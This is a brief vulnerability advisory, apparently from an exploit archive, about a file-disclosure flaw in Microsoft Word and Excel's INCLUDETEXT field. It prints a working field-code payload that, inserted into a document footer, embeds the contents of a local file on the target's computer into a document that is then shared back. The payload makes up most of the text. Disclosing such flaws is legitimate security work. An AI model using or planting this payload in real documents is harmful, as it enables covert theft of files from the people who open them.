Microsoft Word / Excel INCLUDETEXT Document Sharing File Disclosure Vulnerability

Microsoft Word / Excel INCLUDETEXT Document Sharing File Disclosure Vulnerability

The following example was submitted:

Inserting the following field structure into the footer of the last page of the document will steal the contents of c:\a.txt on the target's computer:

{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\\a.txt" "c:\\a.txt" } \* MERGEFORMAT } = "" "" \* MERGEFORMAT }

(The curly braces above represent Microsoft Word field braces.)